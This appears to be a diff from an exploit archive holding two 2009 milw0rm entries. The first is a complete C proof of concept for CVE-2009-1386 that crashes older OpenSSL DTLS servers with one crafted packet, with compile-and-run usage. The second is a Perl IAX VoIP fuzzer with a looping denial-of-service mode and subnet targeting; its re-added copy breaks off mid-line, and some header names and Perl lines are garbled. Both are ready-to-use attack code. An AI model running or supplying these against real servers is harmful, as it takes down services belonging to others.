[2009-06-04] +/* + * cve-2009-1386.c + * + * OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS + * Jon Oberheide + * http://jon.oberheide.org + * + * Information: + * + * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386 + * + * OpenSSL would SegFault if the DTLS server receives a ChangeCipherSpec as + * the first record instead of ClientHello. + * + * Usage: + * + * Pass the host and port of the target DTLS server: + * + * $ gcc cve-2009-1386.c -o cve-2009-1386 + * $ ./cve-2009-1386 1.2.3.4 666 + * + * Notes: + * + * Much easier than the memory exhaustion DoS issue (CVE-2009-1378) as this + * only requires a single ChangeCipherSpec datagram, but affects an older + * version of OpenSSL. + * + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int +main(int argc, char **argv) +{ + int sock, ret; + char *ptr, *err; + struct hostent *h; + struct sockaddr_in target; + char buf[64]; + + if (argc < 3) { + err = "Pass the host and port of the target DTLS server"; + printf("[-] Error: %s\n", err); + exit(1); + } + + h = gethostbyname(argv[1]); + if (!h) { + err = "Unknown host specified"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + exit(1); + } + + target.sin_family = h->h_addrtype; + memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length); + target.sin_port = htons(atoi(argv[2])); + + sock = socket(AF_INET, SOCK_DGRAM, 0); + if (sock == -1) { + err = "Failed creating UDP socket"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + exit(1); + } + + ret = connect(sock, (struct sockaddr *) &target, sizeof(target)); + if (ret == -1) { + err = "Failed to connect socket"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + exit(1); + } + + memcpy(buf, "\x14\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01", 14); + + printf("[+] Sending DTLS datagram of death at %s:%s...\n", argv[1], argv[2]); + + send(sock, buf, 14, 0); + + close(sock); + + return 0; +} + +// milw0rm.com 
[2009-06-04]
diff --git a/platforms/multiple/dos/8940.pl b/platforms/multiple/dos/8940.pl
index cdddf5476..0efc6663e 100755
--- a/platforms/multiple/dos/8940.pl
+++ b/platforms/multiple/dos/8940.pl
@@ -1,510 +1,510 @@ -#!/usr/bin/perl -w -#udp IAX protocol fuzzer -#Created: Blake Cornell -# Exploits found with this code can be -# found at -# http://www.securityscraper.com/ -#Released under the VoIPER project -# -# Do not hesitate to show enthusiasm and support -# and help develop this further. - -use strict; -use IO::Socket; -use Getopt::Long; -use Net::Subnets; -use Pod::Usage; - -my @target_port = (4569); -my @targets = ('127.0.0.1'); -my $result = GetOptions('port|p=i' => \(my $port = ''), - 'host|h=s' => \(my $host = ''), - 'dos' => \(my $dos = ''), - 'bruteforce' => \(my $bruteforce = ''), - 'timeout|t=i' => \(my $timeout = ''), - 'dust=i' => \(my $dust = ''), - 'listen' => \(my $listen = ''), - 'verbose|v' => \(my $verbose = ''), - 'help|?' => \(my $help = '')) or pod2usage(2); - -if($help) { printUsage(); } -if($host) { @targets=@{retHosts($host)}; } -if($port) { $target_port[0] = $port; } -if($listen&&$dos) { print("DoS mode is in Listening Mode\n"); } - -for(my $i=0; $i<=$#targets;$i++) { - if($verbose) { print($targets[$i]."\n"); } - fuzzIAX($targets[$i],4569,$timeout); -} -exit; - -sub fuzzIAX { - my($target,$port,$timeout,@args)=@_; - - if($verbose) { print("Trying $target:$port\n"); } - - socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")); - - my %iaxFrameTypes=( - 'Nan' => "00", - 'DTMF' => "01", - 'VOICE' => "02", - 'VIDEO' => "03", - 'CONTROL' => "04", - 'Null' => "05", - 'IAXCONTROL' => "06", - 'TEXT' => "07", - 'IMAGE' => "08", - 'HTML' => "09", - 'COMFORTNOISE' => "0a", - 'Unknown' => "0b", - 'Unknown' => "0c", - 'Unknown' => "0d", - 'Unknown' => "0e", - 'Unknown' => "0f"); - - my %iaxControls=( - 'Nan' => "00", - 'HANGUP' => "01", - 'Reserved' => "02", - 'RINGING' => "03", - 'ANSWER' => "04", - 'BUSY' => "05", - 'Reserved' => "06", - 'Reserved' => "07", - 'CONGESTION' => "08", - 'FLASH_HOOK' => "09", - 'Reserved' => "0a", - 'OPTION' => "0b", - 'KEY_RADIO' => "0c", - 'UNKEY_RADIO' => "0d", - 'CALL_PROGRESS' => "0e", - 
'CALL_PROCEEDING' => "0f", - 'HOLD' => "10", - 'UNHOLD' => "11"); - - my %iaxControlFrames=( - 'Nan' => "00", - 'NEW' => "01", - 'PING' => "02", - 'PONG' => "03", - 'ACK' => "04", - 'HANGUP' => "05", - 'REJECT' => "06", - 'ACCEPT' => "07", - 'AUTHREQ' => "08", - 'AUTHREP' => "09", - 'INVAL' => "0a", - 'LAGRQ' => "0b", - 'LAGRP' => "0c", - 'REGREQ' => "0d", - 'REGAUTH' => "0e", - 'REGACK' => "0f", - 'REGREJ' => "10", - 'REGREL' => "11", - 'VNACK' => "12", - 'DPREQ' => "13", - 'DPREP' => "14", - 'DIAL' => "15", - 'TXREQ' => "16", - 'TXCNT' => "17", - 'TXACC' => "18", - 'TXREADY' => "19", - 'TXREL' => "1a", - 'TXREJ' => "1b", - 'QUELCH' => "1c", - 'UNQUELCH' => "1d", - 'POKE' => "1e", - 'Reserved' => "1f", - 'MWI' => "20", - 'UNSUPPORT' => "21", - 'TRANSFER' => "22", - 'Reserved' => "23", - 'Reserved' => "24", - 'Reserved' => "25"); - - my %iaxHTML = ( - 'SEND_URL' => 1, - 'DATA_FRAME' => 2, - 'BEGINNING_FRAME' => 4, - 'END_FRAME' => 8, - 'LOAD_COMPLETE' => 16, - 'PEER_NO_HTML' => 17, - 'LINK_URL' => 18, - 'UNLINK_URL' => 19, - 'REJECT_LINK_URL' => 20); - - my %iaxIE = ( - 'CALLED_NUMBER' => "01", - 'CALLING_NUMBER' => "02", - 'CALLING_ANI' => "03", - 'CALLING_NAME' => "04", - 'CALLED_CONTEXT' => "05", - 'USERNAME' => "06", - 'PASSWORD' => "07", - 'CAPABILITY' => "08", - 'FORMAT' => "09", - 'LANGUAGE' => "0a", - 'VERSION' => "0b", - 'ADSPICE' => "0c", - 'DNID' => "0d", - 'AUTHMETHODS' => "0e", - 'CHALLENGE' => "0f", - 'MD5_RESULT' => "10", - 'RSA_RESULT' => "11", - 'APPARENT_ADDR' => "12", - 'REFRESH' => "13", - 'DPSTATUS' => "14", - 'CALLNO' => "15", - 'CAUSE' => "16", - 'IAX_UNKNOWN' => "17", - 'MSGCOUNT' => "18", - 'AUTOANSWER' => "19", - 'MUSICONHOLD' => "1a", - 'TRANSFERID' => "1b", - 'RDNIS' => "1c", - 'Reserved' => "1d", - 'Reserved' => "1e", - 'DATETIME' => "1f", - 'Reserved' => "20", - 'Reserved' => "21", - 'Reserved' => "22", - 'Reserved' => "23", - 'Reserved' => "24", - 'Reserved' => "25", - 'CALLINGPRES' => "26", - 'CALLINGTON' => "27", - 'CALLINGTNS' => 
"28", - 'SAMPLINGRATE' => "29", - 'CAUSECODE' => "2a", - 'ENCRYPTION' => "2b", - 'ENCKEY' => "2c", - 'CODEC_PREFS' => "2d", - 'RR_JITTER' => "2e", - 'RR_LOSS' => "2f", - 'RR_PKTS' => "30", - 'RR_DELAY' => "31", - 'RR_DROPPED' => "32", - 'RR_000' => "33"); - - my %iaxDTMF = ( - '0' => 0, - '1' => 1, - '2' => 2, - '3' => 3, - '4' => 4, - '5' => 5, - '6' => 6, - '7' => 7, - '8' => 8, - '9' => 9, - '*' => 10, - '#' => 11, - 'A' => 12, - 'B' => 13, - 'C' => 14, - 'D' => 15); - - my $MAXLEN = 1024; - my $TIMEOUT = 1; - if(defined($timeout) && $timeout ne '' && $timeout != 0) { #timeout of 0 hangs - #unanswered requests - $TIMEOUT=$timeout; - } - - if($dos) { - if($verbose) { print("Dos attempts initiated\n"); } - - my $src_call = "8000"; - my $dst_call = "0000"; - my $timestamp = "00000000"; - - #use rand sequence information to line up RE issues. - my $outbound_seq = unpack("H2",pack("H2",int(rand(256)))); - my $inbound_seq = unpack("H2",pack("H2",int(rand(256)))); - #or not - #my $outbound_seq = "00"; - #my $inbound_seq = "00"; - - for(my $i=1; 1==1; $i++) { - foreach my $frame (keys(%iaxFrameTypes)) { - foreach my $subset (keys(%iaxControlFrames)) { - foreach my $ie (keys(%iaxIE)) { - my $out_msg = $src_call . - $dst_call . - $timestamp . - $outbound_seq . - $inbound_seq . - $iaxFrameTypes{$frame} . - $iaxControlFrames{$subset} . - $iaxIE{$ie}; - if(my @args = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,$listen,0)) { - if($verbose && $i%1==0) { - print('['.scalar(localtime).'] '); - print($frame.' '.$subset.' 
'.$ie."\n"); - } - } - } - } - } - print "Looping\n"; - } - }elsif($bruteforce) { - while(1) { - bruteForceFUZZ($target,$port,$listen,$timeout,\%iaxFrameTypes,\%iaxControlFrames,\%iaxIE); - print("\t\tLooping\n\n"); - sleep(5); - } - }else{ ###smart fuzz - - my $src_call = "8000"; - my $dst_call = "0000"; - my $timestamp = "00000000"; - my $outbound_seq = "00"; - my $inbound_seq = "00"; - -foreach my $frameType (keys(%iaxFrameTypes)) { - if($frameType eq 'CONTROL') { - foreach my $controlKey (keys(%iaxControls)) { - foreach my $ieKey (keys(%iaxIE)) { - my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxControls{$controlKey} . $iaxIE{$ieKey}."00"; - if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { - if(defined($recv[0]) && defined($recv[1])) { - print('['.scalar(localtime).'] '); - print($recv[0].' '.$recv[1].' '.$frameType.' '.$controlKey." ".$ieKey."\n"); - } - if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { - print(length($recv[2])-length($out_msg)." bytes difference\n"); - print($out_msg.' '.$recv[2]."\n"); - } - } - } - } - - }elsif($frameType eq 'IAXCONTROL') { - foreach my $frameKey (keys(%iaxControlFrames)) { - foreach my $ieKey (keys(%iaxIE)) { - my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxControlFrames{$frameKey} . $iaxIE{$ieKey}.'00'; - if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { - if(defined($recv[0]) && defined($recv[1])) { - logAngPrint('['.scalar(localtime).'] '); - print($recv[0].' '.$recv[1].' '.$frameType.' '.$frameKey." ".$ieKey.' '); - } - if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { - print(length($recv[2])-length($out_msg)." bytes difference\n"); - print($out_msg.' 
'.$recv[2]."\n"); - } - } - } - } - }elsif($frameType eq 'HTML') { - foreach my $htmlKey (keys(%iaxHTML)) { - foreach my $ieKey (keys(%iaxIE)) { - my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxHTML{$htmlKey} . $iaxIE{$ieKey}.'00'; - if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { - if(defined($recv[0]) && defined($recv[1])) { - print('['.scalar(localtime).'] '); - print($recv[0].' '.$recv[1].' '.$frameType.' '.$htmlKey." ".$ieKey.' '); - } - if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { - print(length($recv[2])-length($out_msg)." bytes difference\n"); - print($out_msg.' '.$recv[2]."\n"); - } - } - } - } - - }elsif($frameType eq 'DTMF') { - foreach my $dtmfKey (keys(%iaxDTMF)) { - foreach my $ieKey (keys(%iaxIE)) { - my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxDTMF{$dtmfKey} . $iaxIE{$ieKey}.'00'; - if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { - if(defined($recv[0]) && defied($recv[2])) { - print('['.scalar(localtime).'] '); - print($recv[0].' '.$recv[1].' '.$frameType.' '.$dtmfKey." ".$ieKey.' '); - } - if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { - print(length($recv[2])-length($out_msg)." bytes difference\n"); - print($out_msg.' '.$recv[2]."\n"); - } - } - } - } - }elsif($frameType eq 'TEXT') { - my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . "00"; #text frame types "must" have a subclass of 0? - if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { - if(defined($recv[0]) && defined($recv[1])) { - print('['.scalar(localtime).'] '); - print($recv[0].' '.$recv[1].' '.$frameType.' 00 '); - } - if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { - print(length($recv[2])-length($out_msg)." 
bytes difference\n"); - print($out_msg.' '.$recv[2]."\n"); - } - } - }else{ - foreach my $frameKey (keys(%iaxControlFrames)) { - foreach my $ieKey (keys(%iaxIE)) { - my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxControlFrames{$frameKey} . $iaxIE{$ieKey}.'00'; - if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { - if(defined($recv[0]) && defined($recv[1])) { - print('['.scalar(localtime).'] '); - print($recv[0].' '.$recv[1].' '.$frameType.' '.$frameKey." ".$ieKey.' '); - } - if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { - print(length($recv[2])-length($out_msg)." bytes difference\n"); - print($out_msg.' '.$recv[2]."\n"); - } - } - } - } - } - } - } -} - -sub sendUDPSocket { - my($msg,$target,$port,$timeout,$listen,@args)=@_; - - my $MAXLEN=1024; - - #my($respaddr,$port); - my $out_msg = pack("H*",$msg); - my $ipaddr = inet_aton($target); - my $sin = sockaddr_in($port,$ipaddr); - send(PING, $out_msg, 0, $sin) == length($out_msg) or die "cannot send to $target : $port : $!\n"; - - if($listen) { - #sleep(.005); - eval { - local $SIG{ALRM} = sub { die "alarm time out"; }; - alarm $timeout; - #alarm $timeout; - while (1) { - my $recvfrom = recv(PING, my $in_msg, $MAXLEN, 0) or die "recv: $!"; - ($port, $ipaddr) = sockaddr_in($recvfrom); - my $respaddr = inet_ntoa($ipaddr); - if($verbose) { - displayIAXRaw($respaddr,$port,$respaddr,$out_msg,$in_msg); - } - return($respaddr,$port,unpack("H*",$in_msg)); - } - }; - return 0; - } -} - -sub bruteForceFUZZ { - my($target,$port,$listen,$timeout,$refFrameTypes,$refControlFrames,$refIE,@args)=@_; - - my %iaxFrameTypes=%{$refFrameTypes}; - my %iaxControlFrames=%{$refControlFrames}; - my %iaxIE=%{$refIE}; - - for(my $a=32768;$a<=32768;$a++) {# Full Packet 4byte - for(my $b=0;$b<=0;$b++) {# Dest Call 4byte - for(my $c=0;$c<=0;$c++) {# Timestamp 8byte - #for(my $d=0;$d<=0;$d++) {# Out Seq # 2byte - my $loopD=1; - 
#for(my $d=unpack("H2",pack("H2",int(rand(256))));$loopD;$d++) {# Out Seq # 2byte - # $loopD=0; - - my $outbound_seq = unpack("H2",pack("H2",int(rand(256)))); - my $inbound_seq = unpack("H2",pack("H2",int(rand(256)))); - - - #if($verbose) {print(sprintf("%04x",$a)." ".sprintf("%04x",$b)." ".sprintf("%08x",$c)." ".sprintf("%02x",$d)."\n"); } - for(my $d=0;1;$d++) { - for(my $e=0;1;$e++) {# In Seq # 2byte - foreach my $frameType (keys(%iaxFrameTypes)) { - foreach my $frameKey (keys(%iaxControlFrames)) { - foreach my $ie (keys(%iaxIE)) { - for(my $f=0;$f<=0;$f++) { - my $maxDust=10; - if($listen) { $maxDust/=2; } - if(defined($dust) && length($dust) > 0) { $maxDust=$dust; } - for(my $z=1;$z<=$maxDust;$z++) { - my $len = int(rand(9)); - my $box= int(rand("9"x(($len+1)))); - for(my $zz=1;$zz<=$maxDust;$zz++) { - my $hex_msg = sprintf("%04x",$a).sprintf("%04x",$b).sprintf("%08x",$c).sprintf("%02x",$d).sprintf("%02x",$e). $iaxFrameTypes{$frameType} . $iaxControlFrames{$frameKey} . $iaxIE{$ie} . sprintf("%02x",$f) . sprintf("%0".$len."x",$box); - if($verbose) {print("[" . scalar(localtime) . "] '" . 
$frameType."_".$frameKey."_".$ie."_".sprintf("%02x",$f)."_".sprintf("%0".$len."x",$box)."'\n"); } - foreach my $var (sendUDPSocket($hex_msg,$target,$port,1,$listen)) { if($verbose) { print($var."_"); } } - } - }}}}}}}}}} #<------ VERY IMPORTANT -} - -sub retIAXHostActive { - my($target,$port,@args)=@_; - my $out_msg=''; - if(my @recv = sendUDPSocket($out_msg,$target,$port,1,1)) { - return 1; - } - return 0; -} - -sub retHosts { - my($host,@args)=@_; - my @addrs; - - if(!$host) { return ('127.0.0.1') }; - - if($host =~ /^([\d]{1,3}).([\d]{1,3}).([\d]{1,3}).([\d]{1,3})\/([\d]{1,2})$/ && $1 >= 0 && $1 <= 255 && $2 >= 0 && $2 <= 255 && $3 >= 0 && $3 <= 255 && $4 >= 0 && $4 <= 255) { - #Check to see if host is valid class C CIDR Address - if($verbose) { print("Setting CIDR Address Range\n"); } - my $sn = Net::Subnets->new; - - my($low,$high)=$sn->range(\$host); - if($verbose) { print("Determined IP Ranges From $$low - $$high\n"); } - return \@{ $sn->list(\($$low,$$high)) }; - }elsif($host =~ /^([\d]{1,3}).([\d]{1,3}).([\d]{1,3}).([\d]{1,3})$/ && $1 >= 0 && $1 <= 255 && $2 >= 0 && $2 <= 255 && $3 >= 0 && $3 <= 255 && $4 >= 0 && $4 <= 255) { - #Check to see if host is valid IP - push(@addrs,"$1.$2.$3.$4"); - }else{ - push(@addrs,$host); - } - return \@addrs; -} - -sub displayIAXRaw { - my($respaddr,$port,$out_msg,$in_msg)=@_; - - if(defined($in_msg) && unpack("H*",$in_msg) ne '80000000000000000000060a') { - print("[" . scalar(localtime) . "] $respaddr:$port\t$respaddr\t" . unpack("H*",$out_msg) . "\t". unpack("H*",$in_msg) . "\n"); - }elsif(defined($respaddr) && defined($port)) { - print(scalar(localtime) . 
" $respaddr:$port\t$respaddr\n"); - - } -} - -sub displayIAXPacket { - my($hex_msg,@args)=@_; - - my $width=32/8; - - for(my $i=0;$i*$width<=length($hex_msg);$i++) { - print(substr($hex_msg,$i*$width,$width)."\n"); - } - #print $hex_msg."\n"; -} - -sub printUsage { - print "$0 --dos\n\t\tWill loop through known or manually preset packet combinations.\n"; - print "$0 --bruteforce\n\t\tBrute force fuzzes on default port of 4569. It will try random data packaging at the end of a valid packet. It will by default send 10 per each packet.\n"; - print "$0 -h 127.0.0.1 --bruteforce --dust 1\n\t\tBrute force fuzzes on default port of 4569. It will try random data packaging at the end of a valid packet. It will only send 1 of each packet.\n"; - print "$0 \n\t\tScans the loopback interface by rough usage from IETF guidelines.\n"; - exit; -} - -sub logAndPrint { - my($string,@args)=@); - - if(1==1 || defined($string)) { - print $string; - open(FLE,">>$0_logs_[".scalar(localtime)."] $string"); - print FLE $string; - close(FLE); - } -} - -# milw0rm.com [2009-06-12] +#!/usr/bin/perl -w +#udp IAX protocol fuzzer +#Created: Blake Cornell +# Exploits found with this code can be +# found at +# http://www.securityscraper.com/ +#Released under the VoIPER project +# +# Do not hesitate to show enthusiasm and support +# and help develop this further. + +use strict; +use IO::Socket; +use Getopt::Long; +use Net::Subnets; +use Pod::Usage; + +my @target_port = (4569); +my @targets = ('127.0.0.1'); +my $result = GetOptions('port|p=i' => \(my $port = ''), + 'host|h=s' => \(my $host = ''), + 'dos' => \(my $dos = ''), + 'bruteforce' => \(my $bruteforce = ''), + 'timeout|t=i' => \(my $timeout = ''), + 'dust=i' => \(my $dust = ''), + 'listen' => \(my $listen = ''), + 'verbose|v' => \(my $verbose = ''), + 'help|?' 
=> \(my $help = '')) or pod2usage(2); + +if($help) { printUsage(); } +if($host) { @targets=@{retHosts($host)}; } +if($port) { $target_port[0] = $port; } +if($listen&&$dos) { print("DoS mode is in Listening Mode\n"); } + +for(my $i=0; $i<=$#targets;$i++) { + if($verbose) { print($targets[$i]."\n"); } + fuzzIAX($targets[$i],4569,$timeout); +} +exit; + +sub fuzzIAX { + my($target,$port,$timeout,@args)=@_; + + if($verbose) { print("Trying $target:$port\n"); } + + socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")); + + my %iaxFrameTypes=( + 'Nan' => "00", + 'DTMF' => "01", + 'VOICE' => "02", + 'VIDEO' => "03", + 'CONTROL' => "04", + 'Null' => "05", + 'IAXCONTROL' => "06", + 'TEXT' => "07", + 'IMAGE' => "08", + 'HTML' => "09", + 'COMFORTNOISE' => "0a", + 'Unknown' => "0b", + 'Unknown' => "0c", + 'Unknown' => "0d", + 'Unknown' => "0e", + 'Unknown' => "0f"); + + my %iaxControls=( + 'Nan' => "00", + 'HANGUP' => "01", + 'Reserved' => "02", + 'RINGING' => "03", + 'ANSWER' => "04", + 'BUSY' => "05", + 'Reserved' => "06", + 'Reserved' => "07", + 'CONGESTION' => "08", + 'FLASH_HOOK' => "09", + 'Reserved' => "0a", + 'OPTION' => "0b", + 'KEY_RADIO' => "0c", + 'UNKEY_RADIO' => "0d", + 'CALL_PROGRESS' => "0e", + 'CALL_PROCEEDING' => "0f", + 'HOLD' => "10", + 'UNHOLD' => "11"); + + my %iaxControlFrames=( + 'Nan' => "00", + 'NEW' => "01", + 'PING' => "02", + 'PONG' => "03", + 'ACK' => "04", + 'HANGUP' => "05", + 'REJECT' => "06", + 'ACCEPT' => "07", + 'AUTHREQ' => "08", + 'AUTHREP' => "09", + 'INVAL' => "0a", + 'LAGRQ' => "0b", + 'LAGRP' => "0c", + 'REGREQ' => "0d", + 'REGAUTH' => "0e", + 'REGACK' => "0f", + 'REGREJ' => "10", + 'REGREL' => "11", + 'VNACK' => "12", + 'DPREQ' => "13", + 'DPREP' => "14", + 'DIAL' => "15", + 'TXREQ' => "16", + 'TXCNT' => "17", + 'TXACC' => "18", + 'TXREADY' => "19", + 'TXREL' => "1a", + 'TXREJ' => "1b", + 'QUELCH' => "1c", + 'UNQUELCH' => "1d", + 'POKE' => "1e", + 'Reserved' => "1f", + 'MWI' => "20", + 'UNSUPPORT' => "21", + 'TRANSFER' => "22", + 
'Reserved' => "23", + 'Reserved' => "24", + 'Reserved' => "25"); + + my %iaxHTML = ( + 'SEND_URL' => 1, + 'DATA_FRAME' => 2, + 'BEGINNING_FRAME' => 4, + 'END_FRAME' => 8, + 'LOAD_COMPLETE' => 16, + 'PEER_NO_HTML' => 17, + 'LINK_URL' => 18, + 'UNLINK_URL' => 19, + 'REJECT_LINK_URL' => 20); + + my %iaxIE = ( + 'CALLED_NUMBER' => "01", + 'CALLING_NUMBER' => "02", + 'CALLING_ANI' => "03", + 'CALLING_NAME' => "04", + 'CALLED_CONTEXT' => "05", + 'USERNAME' => "06", + 'PASSWORD' => "07", + 'CAPABILITY' => "08", + 'FORMAT' => "09", + 'LANGUAGE' => "0a", + 'VERSION' => "0b", + 'ADSPICE' => "0c", + 'DNID' => "0d", + 'AUTHMETHODS' => "0e", + 'CHALLENGE' => "0f", + 'MD5_RESULT' => "10", + 'RSA_RESULT' => "11", + 'APPARENT_ADDR' => "12", + 'REFRESH' => "13", + 'DPSTATUS' => "14", + 'CALLNO' => "15", + 'CAUSE' => "16", + 'IAX_UNKNOWN' => "17", + 'MSGCOUNT' => "18", + 'AUTOANSWER' => "19", + 'MUSICONHOLD' => "1a", + 'TRANSFERID' => "1b", + 'RDNIS' => "1c", + 'Reserved' => "1d", + 'Reserved' => "1e", + 'DATETIME' => "1f", + 'Reserved' => "20", + 'Reserved' => "21", + 'Reserved' => "22", + 'Reserved' => "23", + 'Reserved' => "24", + 'Reserved' => "25", + 'CALLINGPRES' => "26", + 'CALLINGTON' => "27", + 'CALLINGTNS' => "28", + 'SAMPLINGRATE' => "29", + 'CAUSECODE' => "2a", + 'ENCRYPTION' => "2b", + 'ENCKEY' => "2c", + 'CODEC_PREFS' => "2d", + 'RR_JITTER' => "2e", + 'RR_LOSS' => "2f", + 'RR_PKTS' => "30", + 'RR_DELAY' => "31", + 'RR_DROPPED' => "32", + 'RR_000' => "33"); + + my %iaxDTMF = ( + '0' => 0, + '1' => 1, + '2' => 2, + '3' => 3, + '4' => 4, + '5' => 5, + '6' => 6, + '7' => 7, + '8' => 8, + '9' => 9, + '*' => 10, + '#' => 11, + 'A' => 12, + 'B' => 13, + 'C' => 14, + 'D' => 15); + + my $MAXLEN = 1024; + my $TIMEOUT = 1; + if(defined($timeout) && $timeout ne '' && $timeout != 0) { #timeout of 0 hangs + #unanswered requests + $TIMEOUT=$timeout; + } + + if($dos) { + if($verbose) { print("Dos attempts initiated\n"); } + + my $src_call = "8000"; + my $dst_call = "0000"; + my 
$timestamp = "00000000"; + + #use rand sequence information to line up RE issues. + my $outbound_seq = unpack("H2",pack("H2",int(rand(256)))); + my $inbound_seq = unpack("H2",pack("H2",int(rand(256)))); + #or not + #my $outbound_seq = "00"; + #my $inbound_seq = "00"; + + for(my $i=1; 1==1; $i++) { + foreach my $frame (keys(%iaxFrameTypes)) { + foreach my $subset (keys(%iaxControlFrames)) { + foreach my $ie (keys(%iaxIE)) { + my $out_msg = $src_call . + $dst_call . + $timestamp . + $outbound_seq . + $inbound_seq . + $iaxFrameTypes{$frame} . + $iaxControlFrames{$subset} . + $iaxIE{$ie}; + if(my @args = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,$listen,0)) { + if($verbose && $i%1==0) { + print('['.scalar(localtime).'] '); + print($frame.' '.$subset.' '.$ie."\n"); + } + } + } + } + } + print "Looping\n"; + } + }elsif($bruteforce) { + while(1) { + bruteForceFUZZ($target,$port,$listen,$timeout,\%iaxFrameTypes,\%iaxControlFrames,\%iaxIE); + print("\t\tLooping\n\n"); + sleep(5); + } + }else{ ###smart fuzz + + my $src_call = "8000"; + my $dst_call = "0000"; + my $timestamp = "00000000"; + my $outbound_seq = "00"; + my $inbound_seq = "00"; + +foreach my $frameType (keys(%iaxFrameTypes)) { + if($frameType eq 'CONTROL') { + foreach my $controlKey (keys(%iaxControls)) { + foreach my $ieKey (keys(%iaxIE)) { + my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxControls{$controlKey} . $iaxIE{$ieKey}."00"; + if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { + if(defined($recv[0]) && defined($recv[1])) { + print('['.scalar(localtime).'] '); + print($recv[0].' '.$recv[1].' '.$frameType.' '.$controlKey." ".$ieKey."\n"); + } + if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { + print(length($recv[2])-length($out_msg)." bytes difference\n"); + print($out_msg.' 
'.$recv[2]."\n"); + } + } + } + } + + }elsif($frameType eq 'IAXCONTROL') { + foreach my $frameKey (keys(%iaxControlFrames)) { + foreach my $ieKey (keys(%iaxIE)) { + my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxControlFrames{$frameKey} . $iaxIE{$ieKey}.'00'; + if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { + if(defined($recv[0]) && defined($recv[1])) { + logAngPrint('['.scalar(localtime).'] '); + print($recv[0].' '.$recv[1].' '.$frameType.' '.$frameKey." ".$ieKey.' '); + } + if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { + print(length($recv[2])-length($out_msg)." bytes difference\n"); + print($out_msg.' '.$recv[2]."\n"); + } + } + } + } + }elsif($frameType eq 'HTML') { + foreach my $htmlKey (keys(%iaxHTML)) { + foreach my $ieKey (keys(%iaxIE)) { + my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxHTML{$htmlKey} . $iaxIE{$ieKey}.'00'; + if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { + if(defined($recv[0]) && defined($recv[1])) { + print('['.scalar(localtime).'] '); + print($recv[0].' '.$recv[1].' '.$frameType.' '.$htmlKey." ".$ieKey.' '); + } + if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { + print(length($recv[2])-length($out_msg)." bytes difference\n"); + print($out_msg.' '.$recv[2]."\n"); + } + } + } + } + + }elsif($frameType eq 'DTMF') { + foreach my $dtmfKey (keys(%iaxDTMF)) { + foreach my $ieKey (keys(%iaxIE)) { + my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxDTMF{$dtmfKey} . $iaxIE{$ieKey}.'00'; + if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { + if(defined($recv[0]) && defied($recv[2])) { + print('['.scalar(localtime).'] '); + print($recv[0].' '.$recv[1].' '.$frameType.' '.$dtmfKey." ".$ieKey.' 
